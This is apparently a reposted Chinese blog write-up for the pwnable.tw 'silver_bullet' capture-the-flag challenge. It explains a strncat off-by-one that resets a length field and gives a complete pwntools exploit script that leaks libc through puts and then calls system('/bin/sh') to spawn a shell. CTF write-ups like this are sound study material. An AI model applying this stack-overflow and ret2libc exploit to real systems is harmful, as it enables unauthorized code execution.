pwnable.tw silver_bullet

最新推荐文章于 2021-09-01 08:36:05 发布
最新推荐文章于 2021-09-01 08:36:05 发布
阅读量170 收藏
点赞数
原文链接:http://www.cnblogs.com/snip3r/p/10628682.html
版权

产生漏洞的原因

int __cdecl power_up(char *dest)
{
  char s; // [esp+0h] [ebp-34h]
  size_t new_len; // [esp+30h] [ebp-4h]

  new_len = 0;
  memset(&s, 0, 0x30u);
  if ( !*dest )
    return puts("You need create the bullet first !");
  if ( *((_DWORD *)dest + 12) > 47u )           // len>47
    return puts("You can't power up any more !");
  printf("Give me your another description of bullet :");
  read_input(&s, 48 - *((_DWORD *)dest + 12));
  strncat(dest, &s, 48 - *((_DWORD *)dest + 12));// strncat会在dest结尾添加\0结束符,而记录字符串长度的位置正好位于s+0x30的位置,
                                                // s+0x30在strncat添加字符串长度为0x30时会被覆盖为0
  new_len = strlen(&s) + *((_DWORD *)dest + 12);// s+0x30被覆盖为0后new_len变为附加字符串的长度
  printf("Your new power is : %u\n", new_len);
  *((_DWORD *)dest + 12) = new_len;
  return puts("Enjoy it !");
}

脚本

from pwn import *

context.log_level='DEBUG'


r=remote('chall.pwnable.tw',10103)
file=ELF('./silver_bullet')
libc=ELF('./libc_32.so.6')
'''
r=process('./silver_bullet')
file=ELF('./silver_bullet')
libc=ELF('/lib/i386-linux-gnu/libc-2.28.so')
'''

#trigger stack overflow
r.recvuntil('Your choice :')
r.sendline('1')
r.recvuntil('Give me your description of bullet :')
r.send('a'*47)
r.sendline('2')
r.recvuntil('Give me your another description of bullet :')
r.send('b')
#gdb.attach(r)

#leak libc
r.recvuntil('Your choice :')
r.sendline('2')
r.recvuntil('Give me your another description of bullet :')
start=0x080484F0
payload='\xff'*3+p32(0xdeadbeaf)+p32(file.plt['puts'])+p32(start)+p32(file.got['puts'])
payload+=(47-len(payload))*'a'
r.send(payload)
r.recvuntil('Your choice :')
r.sendline('3')
r.recvuntil('Oh ! You win !!\n')
libc_base=u32(r.recv(4))-libc.sym['puts']
success('libc_base:'+hex(libc_base))
sys_addr=libc_base+libc.sym['system']
binsh_addr=libc_base+libc.search('/bin/sh').next()
success('binsh_addr'+hex(binsh_addr))
#gdb.attach(r)

#trigger stack overflow again
r.recvuntil('Your choice :')
r.sendline('1')
r.recvuntil('Give me your description of bullet :')
r.send('a'*47)
r.sendline('2')
r.recvuntil('Give me your another description of bullet :')
r.send('b')

#trigger system('/bin/sh') call
r.recvuntil('Your choice :')
r.sendline('2')
r.recvuntil('Give me your another description of bullet :')
payload1='\xff'*3+p32(0xdeadbeaf)+p32(sys_addr)+p32(0xdeadbeaf)+p32(binsh_addr)
payload1+=(47-len(payload))*'a'
r.send(payload1)
r.recvuntil('Your choice :')
r.sendline('3')
r.recvuntil('Oh ! You win !!\n')
r.interactive()



 

转载于:https://www.cnblogs.com/snip3r/p/10628682.html

weixin_30361641
关注
pwnable.tw 1~5 心累
qq_42192672的博客
12-02 631
听说很难,来找虐 1.Start [100 pts] 之前湖湘杯有一题啥防护措施都没开启,我就不会做,所以不敢开心的太早 拖进IDA,这啥东西 还是直接看汇编吧 这是个系统调用 大概就是系统中断之后直接调用吧,边上有注释,不然我直接凉了 来,看一下汇编 先把地址给ecx,给了给长度范围,饭后执行标准输出,输出到终端,然后执行写操作 进入写函数以后,标准读入,长度还是2...
no_silver_bullet
04-10
### No Silver Bullet: Essence and Accidents of Software Engineering #### 引言 《No Silver Bullet: Essence and Accidents of Software Engineering》是由Frederick P. Brooks Jr.撰写的一篇经典论文,该论文...
pwnable.tw Silver_Bulllet write up
qq_43189757的博客
10-30 203
程序保护: 程序逻辑分析: 1.创建银弹 在create_bullet 函数中输入得字符串得长度为银弹的power大小, 最大为0x30, 只能创建一次 &s -> &s + 48 存放字符串 &s + 48 存放power大小 2.Power 提升 如果银弹已被创建并且银弹的大小小于0x30, 那么可以提升银弹的power直至上限0x30 漏洞点: 漏洞点...
twsilver_bullet
weixin_43960998的博客
02-16 220
程序与利用 create 函数如下: 向 s 中读取字节,这个传进来的 s 在main函数栈帧的如下位置: s + 48 处存放了这段字符的长度。 power up 函数如下: 这里有一个非常重要的函数 strncat(): char *strncat(char *dest, const char *src, size_t n) 这个函数是把 src 指向的字符串追加到 dest 字符串的结尾,直到 n 字符长度为止。如果 src 字符串的长度不足 n 则全部追加,如果超过 n 则只追加前 n 个字
buuoj Pwn writeup 266-270
yongbaoii的博客
09-01 194
266 pwnable_silverbullet create 创造个什么武器,然后武器描述,然后长度是它的什么power。 power_up 那么显然我刚刚如果通过’\x00’的截断,power整成0,那么我这里可以直接溢出。 beat exp from pwn import * context.log_level = "DEBUG" debug = 0 if debug: p = process("./silver_bullet") libc = ELF('/lib/i386-li
pwnable.kr-passcode
qq_35661990的博客
09-18 599
这道题的难点在于GOT表覆写,理解了GOT表和PLT表的关系就比较好做了。 函数在调用printf等函数的时候需要访问PLT表,而PLT表中储存的是GOT表对应项的地址。 另外一点就是scanf的参数如果没有加&地址符,就会把参数所在栈内的4个字节(我认为是因为题目中要传入%d是四字节的int型吧)当作地址,然后把缓冲区的数据输入进去。(在IDA中看,就是有加地址符,程序会执行lea指...
3DGame.rar_bullet_tank 3d
09-14
3d model of a tank can be achieved scene map, firing bullets. A complete model tanks and bullet models. You can move and attack itself can be rotated
obj_C++_bullet_
10-03
在本项目中,"obj_C++_bullet_" 主要涉及两个关键知识点:C++编程语言和Bullet物理引擎。Bullet是一个开源的3D物理模拟库,广泛应用于游戏开发、动画制作和仿真等领域。而`.obj`文件是一种常见的3D模型格式,用于...
3Dgame.com.rar_3D 游戏_3d游戏
09-20
物理引擎如PhysX或Bullet模拟现实世界中的物理规则,使得游戏中的物体行为更加自然。 5. **AI**:敌兵的行为和决策通常由游戏的AI系统控制。这可能包括路径规划、目标选择、战斗策略等。游戏开发者可能会使用行为树...
weixin121作品集展示微信小程序+ssm.rar
09-13
所有源码,都可正常运行
weixin090体育资讯软件的实现+ssm.rar
09-13
所有源码,都是可以运行起来的
基于java的财务管理系统设计与实现.docx
09-13
基于java的财务管理系统设计与实现.docx
吕嘉诚_训练班表.pdf
最新发布
09-13
吕嘉诚_训练班表.pdf
springboot王者荣耀游戏KPL比赛网上售票系统毕业论文.docx
09-13
springboot王者荣耀游戏KPL比赛网上售票系统毕业论文.docx
基于java的城镇保障性住房管理系统设计与实现.docx
09-13
基于java的城镇保障性住房管理系统设计与实现.docx
技术资料分享FPGA入门系列实验教程V1.0.zip
09-13
技术资料分享FPGA入门系列实验教程V1.0.zip
django荣誉证书管理系统设计与实现毕业论文.docx
09-13
django荣誉证书管理系统设计与实现毕业论文.docx
基于FPGA的数码管计时器
09-13
在 FPGA 中实现计时 59 分 59 秒 999 毫秒并在达到设定时间时蜂鸣器报警的过程如下: 一、总体设计思路利用 FPGA 的时钟信号,通过多个计数器分别对秒、毫秒和分钟进行计数。当计时达到 59 分 59 秒 999 毫秒时,触发蜂鸣器报警信号。 二、模块划分 时钟分频模块: FPGA 通常使用较高频率的时钟源,需要将其分频为合适的频率供各个计数器使用。例如,若原始时钟为 50MHz,可以通过计数器分频得到 1kHz 的时钟信号用于毫秒计数。 毫秒计数器模块: 设计一个范围为 0 到 999 的计数器,以 1kHz 的时钟信号为触发进行计数。当计数到 999 时,产生一个进位信号给秒计数器。 秒计数器模块: 范围为 0 到 59 的计数器,当接收到毫秒计数器的进位信号时进行计数。当计数到 59 时,产生一个进位信号给分钟计数器。 分钟计数器模块: 范围为 0 到 59 的计数器,接收秒计数器的进位信号进行计数。 比较器模块: 用于比较当前的计时值与设定的 59 分 59 秒 999 毫秒是否相等。当相等时,输出一个报警信号。 蜂鸣器控制模块: 接收比较器输出的报警信号。
GEN_BULLET_EVENT = pygame.USEREVENT + 2 pygame.time.set_timer(GEN_BULLET_EVENT, 1000)
06-04
这两行代码的作用是创建一个自定义事件 GEN_BULLET_EVENT,并设置一个定时器,用于触发该事件。具体来说,第一行代码使用 Pygame 中的 USEREVENT 常量加 2 来创建了一个自定义事件 GEN_BULLET_EVENT。在 Pygame 中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值